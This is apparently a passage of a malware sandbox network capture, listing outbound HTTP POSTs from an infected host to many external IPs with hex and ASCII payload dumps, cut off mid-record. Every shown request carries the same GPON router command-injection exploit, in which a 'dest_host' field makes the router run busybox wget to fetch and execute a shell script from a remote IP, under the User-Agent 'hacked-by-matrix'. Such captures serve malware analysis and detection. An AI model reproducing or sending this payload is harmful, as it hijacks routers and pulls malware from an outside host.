                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1338192.168.2.135478242.169.178.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716820002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1339192.168.2.1356186118.252.177.151443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716828108 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1340192.168.2.13383385.190.224.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716829062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1341192.168.2.135304042.42.6.163443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716840029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1342192.168.2.133307242.129.132.71443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716856003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1343192.168.2.1358272118.186.102.116443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716862917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1344192.168.2.1346864212.223.61.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716886997 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1345192.168.2.1355802118.162.241.124443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716914892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1346192.168.2.135551842.240.212.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716914892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1347192.168.2.1355622212.201.4.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716943979 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1348192.168.2.1356386212.75.36.99443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716960907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1349192.168.2.133710642.241.48.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716975927 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1350192.168.2.1357590118.77.240.104443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716995001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1351192.168.2.13522785.243.44.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717005968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1352192.168.2.1357664109.90.124.202443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717022896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1353192.168.2.13585665.18.71.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717024088 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1354192.168.2.1357874212.98.100.68443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717034101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1355192.168.2.133809242.116.11.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717041969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1356192.168.2.133390242.240.167.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717072010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1357192.168.2.1353776109.139.255.203443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717081070 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1358192.168.2.13571305.111.99.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717089891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1359192.168.2.1345614109.244.230.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717120886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1360192.168.2.1360368212.46.23.22443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717124939 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
